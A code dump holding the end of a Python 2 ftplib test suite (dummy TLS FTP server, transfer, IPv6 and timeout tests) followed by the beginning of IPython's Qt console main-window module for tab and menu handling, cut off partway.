super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return ''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return ''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', received.append, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = StringIO.StringIO(RETR_DATA)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler.rest, str(r))
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
sock = self.client.transfercmd('list')
self.assertIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
mainwindow.py
|
"""The Qt MainWindow for the QtConsole
This is a tabbed pseudo-terminal of IPython sessions, with a menu bar for
common actions.
Authors:
* Evan Patterson
* Min RK
* Erik Tollerud
* Fernando Perez
* Bussonnier Matthias
* Thomas Kluyver
* Paul Ivanov
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib imports
import json
import re
import sys
import webbrowser
from threading import Thread
# System library imports
from IPython.external.qt import QtGui,QtCore
from IPython.core.magic import magic_escapes
def background(f):
"""call a function in a simple thread, to prevent blocking"""
t = Thread(target=f)
t.start()
return t
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class MainWindow(QtGui.QMainWindow):
#---------------------------------------------------------------------------
# 'object' interface
#---------------------------------------------------------------------------
_magic_menu_dict = {}
def __init__(self, app,
confirm_exit=True,
new_frontend_factory=None, slave_frontend_factory=None,
):
""" Create a tabbed MainWindow for managing IPython FrontendWidgets
Parameters
----------
app : reference to QApplication parent
confirm_exit : bool, optional
Whether we should prompt on close of tabs
new_frontend_factory : callable
A callable that returns a new IPythonWidget instance, attached to
its own running kernel.
slave_frontend_factory : callable
A callable that takes an existing IPythonWidget, and returns a new
IPythonWidget instance, attached to the same kernel.
"""
super(MainWindow, self).__init__()
self._kernel_counter = 0
self._app = app
self.confirm_exit = confirm_exit
self.new_frontend_factory = new_frontend_factory
self.slave_frontend_factory = slave_frontend_factory
self.tab_widget = QtGui.QTabWidget(self)
self.tab_widget.setDocumentMode(True)
self.tab_widget.setTabsClosable(True)
self.tab_widget.tabCloseRequested[int].connect(self.close_tab)
self.setCentralWidget(self.tab_widget)
# hide tab bar at first, since we have no tabs:
self.tab_widget.tabBar().setVisible(False)
# prevent focus in tab bar
self.tab_widget.setFocusPolicy(QtCore.Qt.NoFocus)
def update_tab_bar_visibility(self):
""" update visibility of the tabBar depending of the number of tab
0 or 1 tab, tabBar hidden
2+ tabs, tabBar visible
send a self.close if number of tab ==0
need to be called explicitly, or be connected to tabInserted/tabRemoved
"""
if self.tab_widget.count() <= 1:
self.tab_widget.tabBar().setVisible(False)
else:
self.tab_widget.tabBar().setVisible(True)
if self.tab_widget.count()==0 :
self.close()
@property
def next_kernel_id(self):
"""constantly increasing counter for kernel IDs"""
c = self._kernel_counter
self._kernel_counter += 1
return c
@property
def active_frontend(self):
return self.tab_widget.currentWidget()
def create_tab_with_new_frontend(self):
"""create a new frontend and attach it to a new tab"""
widget = self.new_frontend_factory()
self.add_tab_with_frontend(widget)
def create_tab_with_current_kernel(self):
"""create a new frontend attached to the same kernel as the current tab"""
current_widget = self.tab_widget.currentWidget()
current_widget_index = self.tab_widget.indexOf(current_widget)
current_widget_name = self.tab_widget.tabText(current_widget_index)
widget = self.slave_frontend_factory(current_widget)
if 'slave' in current_widget_name:
# don't keep stacking slaves
name = current_widget_name
else:
name = '(%s) slave' % current_widget_name
self.add_tab_with_frontend(widget,name=name)
def close_tab(self,current_tab):
""" Called when you need to try to close a tab.
It takes the number of the tab to be closed as argument, or a reference
to the widget inside this tab
"""
# let's be sure "tab" and "closing widget" are respectively the index
# of the tab to close and a reference to the frontend to close
if type(current_tab) is not int :
current_tab = self.tab_widget.indexOf(current_tab)
closing_widget=self.tab_widget.widget(current_tab)
# when trying to be closed, widget might re-send a request to be
# closed again, but will be deleted when event will be processed. So
# need to check that widget still exists and skip if not. One example
# of this is when 'exit' is sent in a slave tab. 'exit' will be
# re-sent by this function on the master widget, which ask all slave
# widgets to exit
if closing_widget==None:
return
#get a list of all slave widgets on the same kernel.
slave_tabs = self.find_slave_widgets(closing_widget)
keepkernel = None #Use the prompt by default
if hasattr(closing_widget,'_keep_kernel_on_exit'): #set by exit magic
keepkernel = closing_widget._keep_kernel_on_exit
# If signal sent by exit magic (_keep_kernel_on_exit, exist and not None)
# we set local slave tabs._hidden to True to avoid prompting for kernel
# restart when they get the signal. and then "forward" the 'exit'
# to the main window
if keepkernel is not None:
for tab in slave_tabs:
tab._hidden = True
if closing_widget in slave_tabs:
try :
self.find_master_tab(closing_widget).execute('exit')
except AttributeError:
self.log.info("Master already closed or not local, closing only current tab")
self.tab_widget.removeTab(current_tab)
self.update_tab_bar_visibility()
return
kernel_client = closing_widget.kernel_client
kernel_manager = closing_widget.kernel_manager
if keepkernel is None and not closing_widget._confirm_exit:
# don't prompt, just terminate the kernel if we own it
# or leave it alone if we don't
keepkernel = closing_widget._existing
if keepkernel is None: #show prompt
if kernel_client and kernel_client.channels_running:
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if closing_widget._may_close:
msg = "You are closing the tab : "+'"'+self.tab_widget.tabText(current_tab)+'"'
info = "Would you like to quit the Kernel and close all attached Consoles as well?"
justthis = QtGui.QPushButton("&No, just this Tab", self)
justthis.setShortcut('N')
closeall = QtGui.QPushButton("&Yes, close all", self)
closeall.setShortcut('Y')
# allow ctrl-d ctrl-d exit, like in terminal
closeall.setShortcut('Ctrl+D')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(justthis, QtGui.QMessageBox.NoRole)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
if reply == 1: # close All
for slave in slave_tabs:
background(slave.kernel_client.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
closing_widget.execute("exit")
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
elif reply == 0: # close Console
if not closing_widget._existing:
# Have kernel: don't quit, just close the tab
closing_widget.execute("exit True")
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
else:
reply = QtGui.QMessageBox.question(self, title,
"Are you sure you want to close this Console?"+
"\nThe Kernel and other Consoles will remain active.",
okay|cancel,
defaultButton=okay
)
if reply == okay:
self.tab_widget.removeTab(current_tab)
elif keepkernel: #close console but leave kernel running (no prompt)
self.tab_widget.removeTab(current_tab)
background(kernel_client.stop_channels)
else: #close console and kernel (no prompt)
self.tab_widget.removeTab(current_tab)
if kernel_client and kernel_client.channels_running:
for slave in slave_tabs:
background(slave.kernel_client.stop_channels)
self.tab_widget.removeTab(self.tab_widget.indexOf(slave))
if kernel_manager:
kernel_manager.shutdown_kernel()
background(kernel_client.stop_channels)
self.update_tab_bar_visibility()
def add_tab_with_frontend(self,frontend,name=None):
""" insert a tab with a given frontend in the tab bar, and give it a name
"""
if not name:
name = 'kernel %i' % self.next_kernel_id
self.tab_widget.addTab(frontend,name)
self.update_tab_bar_visibility()
self.make_frontend_visible(frontend)
frontend.exit_requested.connect(self.close_tab)
def next_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()+1))
def prev_tab(self):
self.tab_widget.setCurrentIndex((self.tab_widget.currentIndex()-1))
def make_frontend_visible(self,frontend):
widget_index=self.tab_widget.indexOf(frontend)
if widget_index > 0 :
self.tab_widget.setCurrentIndex(widget_index)
def find_master_tab(self,tab,as_list=False):
"""
Try to return the frontend that owns the kernel attached to the given widget/tab.
Only finds frontend owned by the current application. Selection
based on port of the kernel might be inaccurate if several kernel
on different ip use same port number.
This function does the conversion tabNumber/widget if needed.
Might return None if no master widget (non local kernel)
Will crash IPython if more than 1 masterWidget
When asList set to True, always return a list of widget(s) owning
the kernel. The list might be empty or containing several Widget.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_client
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widget that are candidate to be the owner of the kernel does have all the same port of the curent widget
# And should have a _may_close attribute
filtered_widget_list = [ widget for widget in widget_list if
widget.kernel_client.connection_file == km.connection_file and
hasattr(widget,'_may_close') ]
# the master widget is the one that may close the kernel
master_widget= [ widget for widget in filtered_widget_list if widget._may_close]
if as_list:
return master_widget
assert(len(master_widget)<=1 )
if len(master_widget)==0:
return None
return master_widget[0]
def find_slave_widgets(self,tab):
"""return all the frontends that do not own the kernel attached to the given widget/tab.
Only find frontends owned by the current application. Selection
based on connection file of the kernel.
This function does the conversion tabNumber/widget if needed.
"""
#convert from/to int/richIpythonWidget if needed
if isinstance(tab, int):
tab = self.tab_widget.widget(tab)
km=tab.kernel_client
#build list of all widgets
widget_list = [self.tab_widget.widget(i) for i in range(self.tab_widget.count())]
# widget that are candidate not to be the owner of the kernel does have all the same port of the curent widget
filtered_widget_list = ( widget for widget in widget_list if
widget.kernel_client.connection_file == km.connection_file)
# Get a list of all widget owning the same kernel and removed it from
# the previous cadidate. (better using sets ?)
master_widget_list = self.find_master_tab(tab, as_list=True)
slave_list = [widget for widget in filtered_widget_list if widget not in master_widget_list]
return slave_list
# Populate the menu bar with common actions and shortcuts
def add_menu_action(self, menu, action, defer_shortcut=False):
"""Add action to menu as well as self
So that when the menu bar is invisible, its actions are still available.
If defer_shortcut is True, set the shortcut context to widget-only,
where it will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if defer_shortcut:
action.setShortcutContext(QtCore.Qt.WidgetShortcut)
def init_menu_bar(self):
#create menu in the order they should appear in the menu bar
self.init_file_menu()
self.init_edit_menu()
self.init_view_menu()
self.init_kernel_menu()
self.init_magic_menu()
self.init_window_menu()
self.init_help_menu()
def init_file_menu(self):
self.file_menu = self.menuBar().addMenu("&File")
self.new_kernel_tab_act = QtGui.QAction("New Tab with &New kernel",
self,
shortcut="Ctrl+T",
triggered=self.create_tab_with_new_frontend)
self.add_menu_action(self.file_menu, self.new_kernel_tab_act)
self.slave_kernel_tab_act = QtGui.QAction("New Tab with Sa&me kernel",
self,
shortcut="Ctrl+Shift+T",
triggered=self.create_tab_with_current_kernel)
self.add_menu_action(self.file_menu, self.slave_kernel_tab_act)
self.file_menu.addSeparator()
self.close_action=QtGui.QAction("&Close Tab",
self,
shortcut=QtGui.QKeySequence.Close,
triggered=self.close_active_frontend
)
self.add_menu_action(self.file_menu, self.close_action)
self.export_action=QtGui.QAction("&Save to HTML/XHTML",
self,
shortcut=QtGui.QKeySequence.Save,
triggered=self.export_action_active_frontend
)
self.add_menu_action(self.file_menu, self.export_action, True)
self.file_menu.addSeparator()
printkey = QtGui.QKeySequence(QtGui.QKeySequence.Print)
if printkey.matches("Ctrl+P") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
printkey = "Ctrl+Shift+P"
self.print_action = QtGui.QAction("&Print",
self,
shortcut=printkey,
triggered=self.print_action_active_frontend)
self.add_menu_action(self.file_menu, self.print_action, True)
if sys.platform != 'darwin':
# OSX always has Quit in the Application menu, only add it
# to the File menu elsewhere.
self.file_menu.addSeparator()
self.quit_action = QtGui.QAction("&Quit",
self,
shortcut=QtGui.QKeySequence.Quit,
triggered=self.close,
)
self.add_menu_action(self.file_menu, self.quit_action)
def init_edit_menu(self):
self.edit_menu = self.menuBar().addMenu("&Edit")
self.undo_action = QtGui.QAction("&Undo",
self,
shortcut=QtGui.QKeySequence.Undo,
statusTip="Undo last action if possible",
triggered=self.undo_active_frontend
)
self.add_menu_action(self.edit_menu, self.undo_action)
self.redo_action = QtGui.QAction("&Redo",
self,
shortcut=QtGui.QKeySequence.Redo,
statusTip="Redo last action if possible",
triggered=self.redo_active_frontend)
self.add_menu_action(self.edit_menu, self.redo_action)
self.edit_menu.addSeparator()
self.cut_action = QtGui.QAction("&Cut",
self,
shortcut=QtGui.QKeySequence.Cut,
triggered=self.cut_active_frontend
)
self.add_menu_action(self.edit_menu, self.cut_action, True)
self.copy_action = QtGui.QAction("&Copy",
self,
shortcut=QtGui.QKeySequence.Copy,
triggered=self.copy_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_action, True)
self.copy_raw_action = QtGui.QAction("Copy (&Raw Text)",
self,
shortcut="Ctrl+Shift+C",
triggered=self.copy_raw_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_raw_action, True)
self.paste_action = QtGui.QAction("&Paste",
self,
shortcut=QtGui.QKeySequence.Paste,
triggered=self.paste_active_frontend
)
self.add_menu_action(self.edit_menu, self.paste_action, True)
self.edit_menu.addSeparator()
selectall = QtGui.QKeySequence(QtGui.QKeySequence.SelectAll)
if selectall.matches("Ctrl+A") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
selectall = "Ctrl+Shift+A"
self.select_all_action = QtGui.QAction("Select &All",
self,
shortcut=selectall,
triggered=self.select_all_active_frontend
)
self.add_menu_action(self.edit_menu, self.select_all_action, True)
def init_view_menu(self):
self.view_menu = self.menuBar().addMenu("&View")
if sys.platform != 'darwin':
# disable on OSX, where there is always a menu bar
self.toggle_menu_bar_act = QtGui.QAction("Toggle &Menu Bar",
self,
shortcut="Ctrl+Shift+M",
statusTip="Toggle visibility of menubar",
triggered=self.toggle_menu_bar)
self.add_menu_action(self.view_menu, self.toggle_menu_bar_act)
fs_key = "Ctrl+Meta+F" if sys.platform == 'darwin' else "F11"
self.full_screen_act = QtGui.QAction("&Full Screen",
self,
shortcut=fs_key,
statusTip="Toggle between Fullscreen and Normal Size",
triggered=self.toggleFullScreen)
self.add_menu_action(self.view_menu, self.full_screen_act)
self.view_menu.addSeparator()
self.increase_font_size = QtGui.QAction("Zoom &In",
self,
shortcut=QtGui.QKeySequence.ZoomIn,
triggered=self.increase_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.increase_font_size, True)
self.decrease_font_size = QtGui.QAction("Zoom &Out",
self,
shortcut=QtGui.QKeySequence.ZoomOut,
triggered=self.decrease_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.decrease_font_size, True)
self.reset_font_size = QtGui.QAction("Zoom &Reset",
self,
shortcut="Ctrl+0",
triggered=self.reset_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.reset_font_size, True)
self.view_menu.addSeparator()
self.clear_action = QtGui.QAction("&Clear Screen",
self,
shortcut='Ctrl+L',
statusTip="Clear the console",
triggered=self.clear_magic_active_frontend)
self.add_menu_action(self.view_menu, self.clear_action)
self.pager_menu = self.view_menu.addMenu("&Pager")
hsplit_action = QtGui.QAction(".. &Horizontal Split",
self,
triggered=lambda: self.set_paging_active_frontend('hsplit'))
vsplit_action = QtGui.QAction(" : &Vertical Split",
self,
triggered=lambda: self.set_paging_active_frontend('vsplit'))
inside_action = QtGui.QAction(" &Inside Pager",
self,
triggered=lambda: self.set_paging_active_frontend('inside'))
self.pager_menu.addAction(hsplit_action)
self.pager_menu.addAction(vsplit_action)
self.pager_menu.addAction(inside_action)
def init_kernel_menu(self):
self.kernel_menu = self.menuBar().addMenu("&Kernel")
# Qt on OSX maps Ctrl to Cmd, and Meta to Ctrl
# keep the signal shortcuts to ctrl, rather than
# platform-default like we do elsewhere.
ctrl = "Meta" if sys.platform == 'darwin' else "Ctrl"
self.interrupt_kernel_action = QtGui.QAction("&Interrupt current Kernel",
self,
triggered=self.interrupt_kernel_active_frontend,
shortcut=ctrl+"+C",
)
self.add_menu_action(self.kernel_menu, self.interrupt_kernel_action)
self.restart_kernel_action = QtGui.QAction("&Restart current Kernel",
self,
triggered=self.restart_kernel_active_frontend,
shortcut=ctrl+"+.",
)
self.add_menu_action(self.kernel_menu, self.restart_kernel_action)
self.kernel_menu.addSeparator()
self.confirm_restart_kernel_action = QtGui.QAction("&Confirm kernel restart",
self,
checkable=True,
checked=self.active_frontend.confirm_restart,
triggered=self.toggle_confirm_restart_active_frontend
)
self.add_menu_action(self.kernel_menu, self.confirm_restart_kernel_action)
self.tab_widget.currentChanged.connect(self.update_restart_checkbox)
def _make_dynamic_magic(self,magic):
"""Return a function `fun` that will execute `magic` on active frontend.
Parameters
----------
magic : string
string that will be executed as is when the returned function is called
Returns
-------
fun : function
function with no parameters, when called will execute `magic` on the
current active frontend at call time
See Also
--------
populate_all_magic_menu : generate the "All Magics..." menu
Notes
-----
`fun` executes `magic` in active frontend at the moment it is triggered,
not the active frontend at the moment it was created.
This function is mostly used to create the "All Magics..." Menu at run time.
"""
# need two level nested function to be sure to pass magic
# to active frontend **at run time**.
def inner_dynamic_magic():
self.active_frontend.execute(magic)
inner_dynamic_magic.__name__ = "dynamics_magic_s"
return inner_dynamic_magic
def populate_all_magic_menu(self, display_data=None):
"""Clean "All Magics..." menu and repopulate it with `display_data`
Parameters
----------
display_data : dict,
dict of display_data for the magics dict of a MagicsManager.
Expects json data, as the result of %lsmagic
"""
for k,v in list(self._magic_menu_dict.items()):
v.clear()
self.all_magic_menu.clear()
if not display_data:
return
if display_data['status'] != 'ok':
self.log.warn("%%lsmagic user-expression failed: %s" % display_data)
return
mdict = json.loads(display_data['data'].get('application/json', {}))
for mtype in sorted(mdict):
subdict = mdict[mtype]
prefix = magic_escapes[mtype]
for name in sorted(subdict):
mclass = subdict[name]
magic_menu = self._get_magic_menu(mclass)
pmagic = prefix + name
# Adding seperate QActions is needed for some window managers
xaction = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
xaction_all = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
magic_menu.addAction(xaction)
self.all_magic_menu.addAction(xaction_all)
def update_all_magic_menu(self):
""" Update the list of magics in the "All Magics..." Menu
Request the kernel with the list of available magics and populate the
menu with the list received back
"""
self.active_frontend._silent_exec_callback('get_ipython().magic("lsmagic")',
self.populate_all_magic_menu)
def _get_magic_menu(self,menuidentifier, menulabel=None):
"""return a submagic menu by name, and create it if needed
parameters:
-----------
menulabel : str
Label for the menu
Will infere the menu name from the identifier at creation if menulabel not given.
To do so you have too give menuidentifier as a CamelCassedString
"""
menu = self._magic_menu_dict.get(menuidentifier,None)
if not menu :
if not menulabel:
menulabel = re.sub("([a-zA-Z]+)([A-Z][a-z])","\g<1> \g<2>",menuidentifier)
menu = QtGui.QMenu(menulabel,self.magic_menu)
self._magic_menu_dict[menuidentifier]=menu
self.magic_menu.insertMenu(self.magic_menu_separator,menu)
return menu
def init_magic_menu(self):
self.magic_menu = self.menuBar().addMenu("&Magic")
